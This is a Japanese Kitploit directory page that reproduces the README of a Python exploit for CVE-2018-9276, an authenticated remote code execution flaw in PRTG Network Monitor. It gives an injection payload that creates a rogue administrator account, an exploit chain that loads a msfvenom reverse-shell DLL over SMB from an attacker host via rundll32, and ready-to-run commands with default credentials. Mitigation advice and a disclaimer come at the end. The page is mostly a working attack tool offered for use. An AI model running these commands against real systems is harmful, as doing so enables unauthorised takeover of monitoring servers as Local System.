Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-9276 — CVE-2018-9276 — PRTG Network Monitor < 18.2.39 認証済みRCE。教育目的および許可を得たペネトレーションテストのみを対象としています。 | Kitploit
ツール/GitHubGitHub/bardlaudian/cve-2018-9276
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育リモートアクセスツールペイロード開発
GitHubbardlaudian/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 — PRTG Network Monitor < 18.2.39 認証済みRCE。教育目的および許可を得たペネトレーションテストのみを対象としています。

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-9276 — PRTG Network Monitor < 18.2.39 の認証済みRCE

Python CVE Platform

⚠️ 免責事項: このツールは教育目的および許可を得たペネトレーションテストのみを対象としています。自分が所有するシステム、または明示的な書面による許可を得たシステムに対してのみ使用してください。無断使用は違法です。


目次

  • 概要
  • 脆弱性の詳細
  • 動作の仕組み
  • 要件
  • インストール
  • 使用方法
  • 使用例
  • 緩和策
  • 参照

概要

PRTG Network Monitor は、Paessler AG が開発したネットワーク監視ツールです。18.2.39 より前のバージョンは、通知機能を介した認証済みコマンドインジェクションに対して脆弱であり、有効な認証情報を持つ攻撃者が Local System(PRTG インストールの既定サービスアカウント)として リモートコード実行(RCE) を達成できます。

この脆弱性は、Josh Berry によるペネトレーションテスト中に発見され、Paessler AG に報告されました。Paessler AG は 2018年4月20日 にパッチをリリースしています。本脆弱性には CVE-2018-9276 が割り当てられました。


脆弱性の詳細


動作の仕組み

PRTG には、特定のイベント発生時に管理者がスクリプトを実行できるようにする通知システムが含まれています。任意のコード実行を防ぐため、PRTG は実行可能なスクリプトをサーバー上の特定ディレクトリにあるものに制限しています。既定では、次の2つのデモスクリプトのみが利用可能です。

  • Demo EXE Notification - OutFile.bat
  • Demo EXE Notification - OutFile.ps1

インジェクションポイント

PowerShell デモスクリプト(OutFile.ps1)は、通知の Parameter フィールドの値を 何のサニタイズも行わずに スクリプトへ直接渡します。これにより、セミコロンの後に任意の PowerShell コマンドを追加してインジェクトすることが可能になります。

root@kitploit:~
test.txt;net user attacker P@ssw0rd! /add;net localgroup administrators attacker /add

PRTG が通知を実行すると、インジェクトされたコマンドは Local System 権限で実行されます。

注記: バッチスクリプト(OutFile.bat)は脆弱ではありません。Paessler はバッチファイルに渡す前に入力をサニタイズしているようです。インジェクションは .ps1 スクリプトを介した場合にのみ機能します。

エクスプロイトの流れ

このエクスプロイトは以下の手順を自動化します。

root@kitploit:~
1. Check server version → confirm target is vulnerable
2. Authenticate → obtain a valid session cookie
3. Stage a file notification → initialise a writable output file on the target
4. Trigger the file notification → execute it via /api/notificationtest.htm
5. Generate a reverse shell DLL → msfvenom (windows/shell_reverse_tcp)
6. Host the DLL → serve it over SMB from the attacker machine
7. Stage a command notification → inject rundll32.exe <UNC_PATH>,0 after the output file
8. Trigger the command notification → execute the DLL on the target
9. Catch the reverse shell → nc -nvlp <LPORT>

rundll32 + SMB を使う理由

PRTG では、インストールディレクトリ内にあるスクリプトのみを通知として実行できるため、任意のバイナリを単純にアップロードして実行することはできません。代わりに、以下の手順を実行します。

  1. msfvenom を使用して Windows リバースシェルを .dll ファイルとして生成します。
  2. その .dll を攻撃者マシンの SMB 共有でホストします。
  3. PowerShell 通知パラメータを介して rundll32.exe \\attacker\share\payload.dll,0 コマンドをインジェクトします。

rundll32.exe は UNC パスから DLL をロードして実行できるため、PRTG が直接実行できるファイルの制限を回避できます。


要件

  • Python 3.8+
  • msfvenom(Metasploit Framework の一部)
  • netcat(nc)
  • impacket — 組み込みの SMB サーバーにのみ必要(オプション。--no-smb を参照)
root@kitploit:~
pip install impacket

DLL をホストする手段がすでにある場合(例: impacket-smbserver、Metasploit の exploit/multi/handler、または別の SMB サーバー)、--no-smb と --shell-location を使用して impacket を完全にスキップできます。


インストール

root@kitploit:~
git clone https://github.com/BardLaudian/cve_2018_9276.git
cd cve_2018_9276
pip install -r requirements.txt   # only impacket

使用方法

root@kitploit:~
usage: cve_2018_9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
                        [--user USER] [--password PASSWORD] [--https]
                        [--no-smb] [--shell-location SHELL_LOCATION] [-v]

options:
  -i, --host            Target IP or hostname
  -p, --port            Target port (e.g. 80 or 443)
  --lhost               Local IP for the reverse shell callback
  --lport               Local port for the reverse shell callback
  --user                PRTG username (default: prtgadmin)
  --password            PRTG password (default: prtgadmin)
  --https               Use HTTPS (self-signed certificates accepted)
  --no-smb              Skip the built-in SMB server (payload already hosted)
  --shell-location      Override the UNC path to the DLL payload
  -v, --verbose         Enable verbose / debug output

使用例

基本的な使用方法(HTTP、デフォルト認証情報)

root@kitploit:~
python3 cve_2018_9276.py \
  -i 10.10.10.10 \
  -p 80 \
  --lhost 10.10.14.5 \
  --lport 4444

HTTPS ターゲットとカスタム認証情報

root@kitploit:~
python3 cve_2018_9276.py \
  -i 10.10.10.10 \
  -p 443 \
  --lhost 10.10.14.5 \
  --lport 4444 \
  --user admin \
  --password Sup3rS3cr3t \
  --https

組み込みの SMB サーバーをスキップ(ペイロードは外部でホスト)

root@kitploit:~
# Host the payload yourself first:
impacket-smbserver share /tmp -smb2support

# Then run the exploit pointing to your share:
python3 cve_2018_9276.py \
  -i 10.10.10.10 \
  -p 80 \
  --lhost 10.10.14.5 \
  --lport 4444 \
  --no-smb \
  --shell-location '\\10.10.14.5\share\payload.dll'

緩和策

  • PRTG を更新する — バージョン 18.2.39 以降に更新してください。これが唯一の完全な修正です。
  • デフォルトの認証情報を変更する — この脆弱性は認証を必要とします。弱いまたはデフォルトの認証情報(prtgadmin / prtgadmin)は、悪用のハードルを劇的に下げます。
  • PRTG Web インターフェイスへのネットワークアクセスを制限する(ファイアウォールルール、VPN など)。
  • 予期しない通知テストの実行を監視するため、PRTG ログを監視する。

参照

  • 初回発見 — CodeWatch(Josh Berry)
  • NVD — CVE-2018-9276
  • Paessler AG パッチ履歴
  • wildkindcc によるオリジナル PoC
ツールをダウンロード
FieldValue
CVECVE-2018-9276
影響を受けるバージョンPRTG Network Monitor < 18.2.39
種別認証済みコマンドインジェクション
必要な権限有効なPRTG認証情報が必要
影響Local System としてのリモートコード実行
CVSSスコア7.2(高)
パッチPRTG 18.2.39(2018年4月20日リリース)